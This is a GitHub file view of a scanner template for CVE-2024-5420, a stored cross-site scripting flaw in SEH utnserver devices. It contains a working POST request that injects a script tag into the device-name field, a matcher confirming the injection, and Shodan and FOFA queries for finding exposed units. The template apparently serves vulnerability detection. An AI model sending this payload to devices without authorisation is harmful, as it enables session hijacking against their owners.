-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-5420.yaml
45 lines (41 loc) · 1.7 KB
/
CVE-2024-5420.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
id: CVE-2024-5420
info:
name: SEH utnserver Pro/ProMAX / INU-100 20.1.22 - XSS
author: K4YD0
severity: high
description: |
A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
- https://seclists.org/fulldisclosure/2024/Jun/4
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
cvss-score: 8.3
cve-id: CVE-2024-5420
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: SEH HTTP Server
fofa-query: title="utnserver Control Center"
vendor: SEH Computertechnik
product: utnserver Pro/ProMAX / INU-100
version: 0 - 20.1.22
tags: cve,cve2024,utnserver,xss
http:
- method: POST
path:
- "{{BaseURL}}/device/description_en.html"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28%22K4YD0%22%29%3C%2Fscript%3E&sys_descr=&sys_contact=
matchers:
- type: word
name: XSS
words:
- '<input name="sys_name" value="“><script>alert("K4YD0")</script>" id="standort" type="text"/>'
part: body
- type: status
status:
- 200